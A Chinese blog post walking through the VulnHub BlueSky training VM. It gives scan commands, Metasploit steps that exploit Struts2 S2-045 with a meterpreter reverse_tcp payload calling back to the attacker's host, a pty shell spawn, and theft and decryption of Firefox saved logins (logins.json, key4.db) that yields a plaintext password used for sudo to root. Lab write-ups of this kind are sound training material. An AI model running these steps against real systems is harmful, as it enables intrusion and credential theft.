Vulnhub:BlueSky

已于 2024-09-15 20:02:40 修改
阅读量341 收藏 9
点赞数 11
分类专栏: VulnHub 文章标签: web安全 网络安全 linux 安全 笔记
于 2024-09-15 19:59:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aukum/article/details/142287026
版权

靶机下载地址

信息收集

主机发现

nmap扫描攻击机同网段存活主机。

nmap 192.168.31.0/24 -Pn -T4

靶机ip:192.168.31.171。

端口扫描

nmap 192.168.31.171 -A -p- -T4

开放端口22,8080。

目录扫描

访问8080端口,如图,是tomcat管理页面,尝试弱口令登录页面失败。

dirb http://192.168.31.171:8080

无信息。

vulmap漏洞扫描

vulmap是一款可对Web容器、Web服务器、Web中间件以及CMS等Web程序进行漏洞扫描的漏扫工具,还有漏洞利用功能。

测试所有漏洞POC。

python3 vulmap.py -u http://192.168.31.171:8080/

样例目录操控漏洞,没什么利用价值。

继续扫描,--a参数指定漏洞进行检测,tomcat。

python3 vulmap.py -u http://192.168.31.171:8080/manager/html -a "tomcat"

访问http://192.168.31.171:8080/struts2-showcase/,的确存在struts2框架。

指定检测单个漏洞,struts2框架。 

python3 vulmap.py -u http://192.168.31.171:8080/struts2-showcase/ -a "struts2"

存在S2-045S2-046漏洞。Struts2框架存在多个远程代码执行(S2-005、S2-009、S2-013、S2-016、S2-019、S2-020、S2-037、S2-045、S2-046),恶意攻击者可利用漏洞直接获取应用系统的Webshell,甚至获取操作系统以及数据库的权限。

渗透

存在Struts2框架漏洞,msf中搜索exp利用。

search S2-045

S2-045有exp,直接利用。

use 0
options
set rhosts 192.168.31.171
set lhost 192.168.31.121
set payload cmd/unix/python/meterpreter/reverse_tcp
run

拿到meterpreter。

 getshell。

# 进入靶机终端
shell
# 获得交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

get user.txt.

提权

上传提权辅助工具linux-exploit-suggester.sh,运行后提示脏牛漏洞可行。但是经过测试发现该靶机没有安装gcc,无法编译exp。

firefox密码破解

看了wp知道要通过mozilla firefox信息收集到minhtuan的密码才能进一步提权。

接下来找firefox存放用户所有登录信息(包括URL,用户名,密码和其他元数据)的文件,需要先确认firefox版本,因为不同的版本存放登录信息的文件名不同加密方式也可能不同。

firefox --version
Firefox 版本 <32 (key3.db, signons.sqlite)
Firefox 版本 >=32 (key3.db, logins.json)
Firefox 版本 >=58.0.2 (key4.db, logins.json)

locate定位文件位置。locate logins.json

将logins.json和key4.db下载到攻击机,用火狐浏览器密码破解工具firewd破解密码。破解前准备:
将logins.json和key4.db复制到firepwd.py同目录下,执行命令破解密码。

python firepwd.py logins.json

破解得到账户密码minhtuan:skysayohyeah

sudo提权 

sudo -l

表示用户minhtuan可以使用sudo调用root权限执行命令。su root。

get root.txt!🎆

Aukum
关注
专栏目录
Vulnhub--BlueSky:1
m0_63206880的博客
12-30 709
靶场下载地址https://download.vulnhub.com/bluesky/BlueSky.ova 首先扫描一下外网存活ip 找到目标机器的ip 扫描开放了扫描端口服务 得知开了 22 ssh 与8080 目标上还运行了一个Apache Tomcat Tomcat是应用(java)服务器,它只是一个servlet容器,是Apache的扩展 Struts2 漏洞介绍 Struts2:是apache项目下的一个web 框架 漏洞涉及Stru...
vulnhub靶机BlueSky
m0_73248913的博客
01-20 375
vulnhub靶机
vulnhub--Bulesky
weixin_45922278的博客
02-03 1099
目录 一、信息收集 二、漏洞探测 三、漏洞利用 四、提权 五、总结 靶场信息: 地址:https://www.vulnhub.com/entry/bluesky-1,623/ 发布日期:2020年12月10日 难度:简单 目标:获取root shell即(root@localhost:~#),然后在/root下获取标志 运行:VMware Workstation 16.x Pro(默认的NAT网络模式,VMware比VirtualBox更好地工作) 一、信息收集 1...
渗透练习 Vulnhub靶场 Tornado
hljzzj的博客
02-15 2164
No.27 Tornado 靶机信息 下载地址: https://www.vulnhub.com/entry/ia-tornado,639/ 靶场: VulnHub.com 靶机名称: IA: Tornado 难度: 中等 发布时间: 2020年12月20日 提示信息: 无 目标: user.txt和root.txt 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -
靶机渗透练习87-IA:Keyring (1.0.1)
hirak0的博客
04-30 1422
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-keyring-101,718/ Description Difficulty: Intermediate Goal: Get the root shell and read all the 2 flags. Information: No hints will be provided before 24 hours of the release. Try Harder! If you need any hints,
个人总结-网络安全学习和CTF必不可少的一些网站
热门推荐
ida0918的博客
10-04 4万+
学习的地方很多,不能一一列举,一些优秀的网址和博客可能也没有提到,大家补充吧:P 就简单总结一些常用的吧,本人是十足的彩笔,还望大家多多指点,表哥们带我飞Orz http://www.sec-wiki.com/skill/ 安全技能(里面渗透逆向编程都有介绍) http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0
网络安全学习网址
wanger5354的博客
12-10 4235
今天刚翻出朋友一年前发给我的一些学习网址,特地在公众号分享一下,其中有些地址已不能使用http://www.sec-wiki.com/skill/安全技能(里面渗透逆向编程都有介绍)http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0https://www.shentoushi.top/network  渗透师 (网络安全学习网址导航)https://www.anquanquan.info/   安全圈inf
网络安全学习相关网站
qq_44022770的博客
03-29 4553
网络安全学习网址 http://www.sec-wiki.com/skill/安全技能(里面渗透逆向编程都有介绍) http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0 https://www.shentoushi.top/network 渗透师 (网络安全学习网址导航) https://www.anquanquan.info/ 安全圈info(网络安全学习导航网址) 综合学习平台: https://secquan.org 圈子社
网络安全学习和CTF必不可少的一些网站
网络安全
05-11 7380
综合学习平台: http://edu.gooann.com/ 谷安网校 http://www.jikexueyuan.com/ 极客学院 http://www.hetianlab.com/ 合天 http://www.moonsos.com/ 米安网 http://www.ichunqiu.com/ i 春秋 http://www.honyaedu.com/ -红亚 http://www.baimaoxueyuan.com/ 白帽学院 http://www.simplexue.com/ctf/index
bluesky-widgets-demo:使用bluesky-widgets的演示应用程序
04-06
"bluesky-widgets-demo"是一个基于Python开发的项目,它主要展示了如何使用"bluesky-widgets"库来创建和操作用户界面。这个演示应用程序旨在帮助开发者理解和学习如何有效地利用bluesky-widgets的功能来构建自己的...
bluesky-live-feedstock:关于bluesky-live的conda-smithy存储库
02-25
关于bluesky-live 主页: : 软件包许可证:BSD-3-Clause 原料许可证: 简介:用于在bluesky中处理流数据的原型构建块 当前构建状态 所有平台: 当前发行信息 姓名 资料下载 版本 平台类 现场安装bluesky 从...
epics-bluesky-vm:使用EPICS IOC,GUI,Bluesky和相关组件模拟光束线
03-29
在这个项目"epics-bluesky-vm"中,我们看到的是一个利用EPICS IOC(Input/Output Controller)、图形用户界面(GUI)、Bluesky以及相关组件来模拟光束线环境的虚拟机设置。 首先,EPICS IOC是EPICS系统的核心部分,...
BlueSky-开源
05-28
BlueSky-开源】是一款基于C#开发的开源软件,主要功能是演示如何将MySQL数据库与C#编程语言高效地集成在一起,实现协同工作的软件解决方案。这个项目为开发者提供了一个学习和实践数据库集成、C#编程以及协同工作...
网络安全(黑客技术)2024年三个月自学手册
最新发布
2401_85026116的博客
09-14 2288
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客)——自学2024
2401_84466325的博客
09-09 1878
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1939
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全】-文件上传漏洞实战-upload-labs(0~16)
weixin_65311462的博客
09-09 1420
准备:一句话木马:
网络安全】漏洞挖掘:文件上传实现Webshell
等风来
09-10 389
接着,我上传webshell.php文件,文件内容为payload,拦截请求包,将文件名修改为jpg,但回显错误,这说明服务器验证了文件的内容。
p em{color:blue }
06-14
`p em{color:blue}`是一段CSS样式定义,它表示选择器`p em`所匹配的元素内部的文本颜色设置为蓝色。这里`p em`是一个后代选择器,会匹配所有在`<p>`元素内部的`<em>`元素,并将它们的文本颜色设置为蓝色。例如,下面的HTML代码: ``` <p>这是一段包含强调的文本。</p> ``` 会被上述CSS样式定义所影响,使得`<em>`元素内部的文本颜色变为蓝色。 需要注意的是,后代选择器会匹配所有符合条件的后代元素,而不仅仅是直接子元素。如果希望只匹配直接子元素,可以使用子选择器(`>`)来代替后代选择器。例如,`p > em {color:blue}`表示只匹配`<p>`元素的直接子元素中的`<em>`元素。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值